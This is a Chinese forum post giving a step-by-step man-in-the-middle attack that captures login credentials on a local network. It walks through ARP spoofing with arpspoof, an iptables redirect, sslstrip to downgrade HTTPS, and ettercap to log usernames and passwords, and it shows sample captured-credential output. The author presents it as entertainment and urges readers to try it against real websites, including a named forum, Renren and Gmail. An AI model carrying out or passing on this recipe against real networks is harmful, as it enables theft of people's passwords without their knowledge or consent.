Man In The Middle 中间人攻击实例 (大家代码写累了就过来看看吧,娱乐一下)
中间人攻击主要就是利用嗅探器来获得目标的用户名和密码,应该注明,网上这类文章很多,发出来权当代码写累了,娱乐一下,
当然这次试验是以嗅探https为目标的,所以要用到sslstrip.
大家可以用这个论坛 bbs.bccn.net 或者 www. 来实验一下,可以成功
我用人人网实验时,并不是用hhtps来登录的,所以嗅探到的密码是一长串ASCII字符
还有很多网站可以,gmail话,貌似安全性能确实不错,但多试两次照样成功
下面说方法
这里需要的工具有3个,都是耳熟能详的arpspoof, ettercap , sslstrip(这是一个只有108行的python脚本)
目标机器(Victim)是192.168.1.100, 路由器是192.168.1.1, 本机(Attacker) 192.168.1.102
1. 首先我们需要修改ettercap的配置文件 etter.conf
我的是在/usr/local/etc/etter.conf
看到 # if you use iptables 下面粉红色两行了吧,
把这两行前面的 注释 '#' 去掉
2. 接下来要做的是激活 ip_forward 选项,
# echo 1 > /proc/sys/net/ipv4/ip_forward
3. 接下来要做的就是 arpspoofing 了, 地址不要写反了,路由地址在后面
# arpspoof -i wlan0 -t 192.168.1.100 192.168.1.1
这样一来,192.168.1.100 和 192.168.1.1 之间的通信就要全部通过Attacker了,
也就是说Attacker污染了 两台机器的ARP 缓存
4. 打开第二个shell 窗口
# iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
这样一来, Attacker 就可以把来自80端口的包通过10000端口转送出去了
5. 是时最很重要的一步就是sslstrip, 看名字就是知道,消去ssl
让https看起来像http
# python sslstrip.py -a -k -f
6. 同时打开第三个shell窗口,开始监听
# ettercap -T -q -i wlan0
好了,这时192.168.1.100 这台电脑进入任何需要用https 登录的的网站
输入用户名和密码, 这时Attacker 的 ettercap -T -q -i wlan0 这行命令下面就会出现
HTTP : 114.31.104.* :80 -> USER ***@ PASS: *********** INFO: http://****/的字样了。
[ 本帖最后由 madfrogme 于 2012-11-13 12:55 编辑 ]